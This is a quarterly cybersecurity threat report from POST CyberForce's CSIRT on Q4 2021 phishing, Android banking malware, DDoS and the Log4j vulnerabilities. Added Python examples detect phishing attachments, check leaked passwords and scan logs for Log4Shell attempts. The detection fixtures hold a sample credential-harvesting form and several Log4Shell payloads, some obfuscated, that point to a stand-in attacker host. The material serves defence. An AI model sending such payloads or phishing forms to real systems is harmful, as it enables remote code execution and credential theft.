
Cybersecurity weather forecast – 4th quarter 2021

22 February 2022

Figures

General information

After a rather quiet third quarter, the number of incidents handled in Q4 2021 rose by 40% compared with Q3 2021. Phishing remains the most common type of incident. The key events of this end-of-year period were the Log4j (Log4Shell) vulnerability, which affects every product that embeds this library, and some particularly virulent malicious code aimed at Android users.

Phishing  

During the period, phishing accounted for 74% of the incidents handled by the POST CyberForce CSIRT.
The vast majority of phishing attacks targeted POST e-mail customers with an @pt.lu address by imitating the webmail login interface. Here is an example:

We have also seen a range of phishing attempts impersonating LuxTrust. The most common is a kit in which the malicious actors send victims a fake certificate reactivation request:

We have also observed phishing campaigns that attach an HTML file to the e-mail; when the victim opens the file, it renders in the browser as a login page.

Delivering the phishing page as an attachment rather than as a link helps it bypass spam filters and so increases the chance of reaching the target; the page itself is used to harvest corporate Microsoft login credentials.
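To give a concrete idea of what a mail gateway or SOC analyst can look for in such attachments, here is an added example (written for this edited page, not code from POST CyberForce): it parses a constructed sample e-mail, pulls out any HTML attachment and scores it on a few heuristics typical of this technique, namely a password field, a form that posts to an external host, and client-side decoding such as atob(). The message, the domains (example.com and example.net are reserved documentation domains) and the indicator list are all assumptions of the example.

```python
import re
from email import message_from_string
from email.policy import default

# Constructed sample message (not a real capture): an HTML "document" attachment
# that renders a fake Microsoft sign-in form and posts the credentials to an
# attacker-controlled host. All addresses and hosts are documentation values.
SAMPLE_EML = """\
From: sharing@example.com
To: victim@example.com
Subject: Shared document
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please open the attached document to review it.
--b1
Content-Type: text/html; name="Document_2021.html"
Content-Disposition: attachment; filename="Document_2021.html"
Content-Transfer-Encoding: 7bit

<html><head><title>Sign in to your Microsoft account</title></head><body>
<form method="post" action="https://example.net/auth/collect">
  <input type="email" name="login"><input type="password" name="passwd">
  <button>Sign in</button>
</form>
<script>document.write(atob("PGRpdj5TaWduIGluPC9kaXY+"));</script>
</body></html>
--b1--
"""

# A plain message with no attachment, used to show the clean path.
BENIGN_EML = "From: a@example.com\nTo: b@example.com\nSubject: hi\n\nSee you tomorrow.\n"

# Heuristic indicators chosen for this example; tune them to your own traffic.
INDICATORS = {
    "password_field": re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I),
    "form_posts_offsite": re.compile(r"<form[^>]*action\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I),
    "js_decoding": re.compile(r"\b(atob|unescape|eval|document\.write)\s*\(", re.I),
    "brand_lure": re.compile(r"microsoft|office\s*365|outlook|onedrive|sharepoint", re.I),
}


def html_attachments(msg):
    """Yield (filename, html_text) for every HTML part sent as an attachment."""
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        filename = part.get_filename() or ""
        is_html = (part.get_content_type() == "text/html"
                   or filename.lower().endswith((".html", ".htm", ".shtml")))
        if part.get_content_disposition() == "attachment" and is_html:
            yield filename, part.get_payload(decode=True).decode("utf-8", errors="replace")


def analyse_attachment(html: str) -> dict:
    """Score one HTML attachment: a credential form that leaves the page, or
    that is assembled by obfuscated script, is what this phishing kit looks like."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    target = INDICATORS["form_posts_offsite"].search(html)
    return {
        "indicators": [name for name, hit in hits.items() if hit],
        "post_target": target.group(1) if target else None,
        "suspicious": hits["password_field"] and (hits["form_posts_offsite"] or hits["js_decoding"]),
    }


def scan_message(raw: str) -> list:
    """Parse a raw RFC 822 message and return one finding per HTML attachment."""
    msg = message_from_string(raw, policy=default)
    findings = []
    for filename, html in html_attachments(msg):
        finding = analyse_attachment(html)
        finding["filename"] = filename
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan_message(SAMPLE_EML):
        print(finding)
```

Because the credential form is inside the attachment, a URL-reputation check on the e-mail body finds nothing; inspecting the attachment content is what catches it. The brand_lure indicator is informational only and does not by itself mark a part as suspicious.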

With the holidays and the Christmas shopping season approaching, we also saw an increase in phishing based on parcel-delivery notifications. DHL was the most imitated brand worldwide in Q4 2021, overtaking Microsoft.

Reference: https://www.bleepingcomputer.com/news/security/dhl-dethrones-microsoft-as-most-imitated-brand-in-phishing-attacks/

Here is the ranking of phishing hosting providers in Q4 2021 (change in position compared with Q3 in brackets):

  1. Google LLC (=)
  2. Namecheap Inc. (+4)
  3. Bitly Inc (+6)
  4. Cloudflare Inc. (-2)
  5. Amazon Technologies Inc. (=)
  6. HostHatch LLC (New)
  7. Microsoft Corporation (-4)
  8. OVH SAS (=)
  9. Unified Layer (New)
  10. Akamai Technologies Inc. (New)

Vishing/Spam calls  

The final quarter of 2021 brought a resurgence of fraudulent calls with spoofed caller IDs. Most of them appeared to come from Luxembourg mobile numbers.
When the call is answered, a recorded voice claims to be from law enforcement (the police) and states that illegal activities linked to the victim's number have been detected. The recipient is then asked to call back a number in the United States.

Malicious code  

During this quarter, we have seen increased malware activity targeting Android users.

The first is called Flubot. The victim receives a fake text message about a parcel delivery containing a link that downloads the malware as an .apk file. Once installed, the program can steal sensitive information such as banking details, passwords and phone numbers.
The social-engineering pretext changes regularly to keep deceiving victims, and the wording of the message also changes to make detection harder for telecom operators. The malware spreads by exfiltrating the victim's contact list and sending the same message to those contacts.

A second piece of malware, called Medusa, uses the same delivery method: a text message containing a link is sent to the victim to download the malware. This banking Trojan can carry out fraud directly from the phone by automating the login steps of banking apps, checking the victim's balance and making payments. It also uses native Android features to stay discreet and escape the user's attention, which lets it track what is on the screen and monitor taps, for example.

DDoS  

The number of DDoS attacks remains stable, but the attacks are more intense: the largest attack observed this quarter peaked at 21 Gbps.
The two techniques observed were:

  • DNS Reply Flood
  • Global Abnormal UDP

Intrusions 

Credential-stuffing attempts, in which leaked username/password lists from other breaches are replayed against login pages, were observed during the period.
Knowing whether your credentials are already circulating before an attack occurs is one way to avoid falling victim. We recommend checking whether your login details have been leaked by entering your e-mail address on https://haveibeenpwned.com/.
In addition, activating multi-factor authentication (MFA) is a further way of raising the security level of your online accounts: a leaked password alone is then not enough to log in.
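The same service also exposes its Pwned Passwords data through a k-anonymity API, which lets an application (for example a password-change form) check a password against the leak corpus without ever sending the password or its full hash. The following is an added example written for this edited page, not POST's or Have I Been Pwned's own code: it hashes the password with SHA-1, sends only the first five hex characters of the digest to the real range endpoint (https://api.pwnedpasswords.com/range/<prefix>) and matches the remaining 35 characters locally. To run offline it uses a constructed stand-in for the API response; the only real value in it is the SHA-1 of the string "password", and the counts and filler rows are invented.

```python
import hashlib
from typing import Callable

RANGE_URL = "https://api.pwnedpasswords.com/range/"   # real Pwned Passwords endpoint


def split_sha1(password: str) -> tuple:
    """Hash the password with SHA-1 (the key the Pwned Passwords corpus uses) and
    split the upper-case hex digest into the 5-character prefix that is sent to
    the API and the 35-character suffix that never leaves the client."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def breach_count(suffix: str, range_body: str) -> int:
    """Look the local suffix up in a 'SUFFIX:COUNT' range response.
    Padded responses (Add-Padding: true) contain filler rows with count 0,
    which fall through this loop naturally."""
    for row in range_body.splitlines():
        row_suffix, sep, count = row.strip().partition(":")
        if sep and row_suffix.upper() == suffix:
            return int(count)
    return 0


def is_pwned(password: str, fetch_range: Callable[[str], str]) -> int:
    """Return how many times the password appears in the corpus (0 = not seen).
    fetch_range(prefix) must return the text body served at RANGE_URL + prefix."""
    prefix, suffix = split_sha1(password)
    return breach_count(suffix, fetch_range(prefix))


def fetch_range_online(prefix: str) -> str:
    """Real network fetch against the API; not called by the offline demo below."""
    import urllib.request
    req = urllib.request.Request(
        RANGE_URL + prefix,
        headers={"Add-Padding": "true", "User-Agent": "pwned-passwords-demo"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


# Constructed stand-in for the API so the example runs offline. The first row's
# suffix is the genuine SHA-1("password") suffix; its count and the other rows
# are made up (and shortened) placeholders, not data from the real service.
FAKE_RANGES = {
    "5BAA6": "\n".join([
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:12345",
        "0000A1B2C3D4E5F6A7B8C9D0E1F2A3B4C5D:0",
        "FFFF0123456789ABCDEF0123456789ABCDE:7",
    ]),
}


def fake_fetch_range(prefix: str) -> str:
    """Offline replacement for fetch_range_online (assumption of this example)."""
    return FAKE_RANGES.get(prefix, "")


if __name__ == "__main__":
    for candidate in ("password", "correct horse battery staple"):
        print(candidate, "->", is_pwned(candidate, fake_fetch_range))
```

Only the prefix is transmitted, so the service learns nothing about which of the several hundred suffixes in that bucket the client was interested in; the Add-Padding header additionally hides the bucket size. In a real deployment the fetch should be done server-side at password-change time and the result used to reject passwords with a non-zero count.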

Masquerade attacks  

Malicious actors copy legitimate content from our Facebook account onto their fake page.
Even a blue "verified" badge does not always guarantee that the page you are visiting is official. Here is an excerpt showing an unofficial Facebook page (1) without the "verified" badge whose posts appear in the official feed, and a page (2) carrying the badge. Reusing genuine content in this way makes social-network scams more credible.

To avoid these scams, bookmark the links to legitimate sites and reach our social media accounts through the links on our own website rather than through search results or messages.

Vulnerability  

The discovery of the Log4Shell zero-day vulnerability has had an unprecedented impact on the cybersecurity community worldwide since its disclosure on 9 December 2021. Log4j is an open-source logging library written in Java, used by applications to record their activity. Its presence in a very large number of products, coupled with a very large attack surface (the vulnerable code is reached simply by logging attacker-controlled text), makes Log4Shell one of the most significant vulnerabilities of the decade.

The vulnerability, identified as CVE-2021-44228, is rated critical with the maximum CVSSv3 score of 10.0. It allows unauthenticated remote code execution (RCE): Log4j's message-lookup feature resolves ${jndi:...} expressions found in logged strings, so an attacker who can get such a string into a log entry (a User-Agent header, a username, a chat message) can make the application fetch and execute code from a server they control.
The patch provided in version 2.15.0 did not fully fix the flaw: the follow-up CVE-2021-45046 still allows remote code execution in certain non-default configurations and was fixed in 2.16.0. Because of the global reach and severity of the issue, many researchers focused on the Log4j library, which led to the discovery of further cascading vulnerabilities and a succession of patch releases.

Another vulnerability, CVE-2021-45105 (fixed in 2.17.0), can be used for a denial-of-service attack through uncontrolled recursion in lookups.

Finally, the last Log4j vulnerability published in Q4 2021, CVE-2021-44832 (CVSSv3 score 6.6, Medium; fixed in 2.17.1), also allows remote code execution but is much harder to exploit: the malicious actor must first be able to modify the Log4j configuration file of the victim's application, which is rarely the case.
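Since the exploit string has to pass through the application's logs, the logs are also where exploitation attempts can be found after the fact. The following is an added example written for this edited page, not code from POST CyberForce or the Log4j project: it scans web-server access-log lines for ${jndi:...} lookups, including the URL-encoded and nested-lookup variants (${lower:j}, ${::-j}) that attackers widely used to evade naive string matching. The sample log lines are constructed (IP addresses are from the reserved documentation ranges), and the lookup-collapsing logic is a detection heuristic rather than a faithful reimplementation of Log4j's substitution engine.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookups that are not themselves the final ${jndi:...} lookup.
# [^{}]* guarantees we always rewrite from the inside out.
_INNER = re.compile(r"\$\{(?!jndi:)([^{}]*)\}", re.IGNORECASE)
# The decoded payload we are looking for; group 1 is the JNDI scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):[^}]*\}", re.IGNORECASE)

# Constructed sample access log (not a real capture). Lines 1-3 carry a payload
# in the query string, the User-Agent and a URL-encoded parameter; line 4 is benign.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:03:11:05 +0100] "GET /?q=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:03:12:40 +0100] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.9:1389/b}"',
    '198.51.100.8 - - [11/Dec/2021:09:01:13 +0100] "GET /login?user=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fc%7D HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [11/Dec/2021:09:05:00 +0100] "GET /search?q=${price} HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def _collapse_one(inner: str) -> str:
    """Reduce one obfuscation-only lookup to the text it substitutes to."""
    if ":-" in inner:                      # ${any:-x} or ${::-x}: the default value wins
        return inner.split(":-", 1)[1]
    low = inner.lower()
    if low.startswith("lower:"):
        return inner[6:].lower()
    if low.startswith("upper:"):
        return inner[6:].upper()
    # env:, sys:, date: ... cannot be resolved offline. Dropping the lookup keeps
    # the loop finite; this is a heuristic, not Log4j's real behaviour.
    return ""


def decode_lookups(text: str, max_rounds: int = 64) -> str:
    """URL-decode, then peel nested lookups from the inside out until only
    literal text and any surviving ${jndi:...} lookup remain."""
    s = unquote(text)
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _collapse_one(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def scan_line(line: str):
    """Return a finding dict if the line carries a JNDI lookup, else None."""
    decoded = decode_lookups(line)
    m = _JNDI.search(decoded)
    if m is None:
        return None
    return {
        "scheme": m.group(1).lower(),
        "payload": m.group(0),
        # True when the raw line did not contain the literal marker, i.e. the
        # attacker relied on encoding or nested lookups to hide it.
        "obfuscated": "${jndi:" not in unquote(line).lower(),
    }


def scan_log(lines) -> list:
    """Return (line_number, finding) for every suspicious line, 1-based."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := scan_line(line))]


if __name__ == "__main__":
    for n, finding in scan_log(SAMPLE_LOG):
        print(n, finding)
```

A hit here means an attempt, not a confirmed compromise: confirmation needs evidence of the outbound LDAP/RMI connection from the application host to the address in the payload, so pair this scan with egress or DNS logs for the same time window. Matching the literal string "${jndi:" alone would have missed lines 2 and 3.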
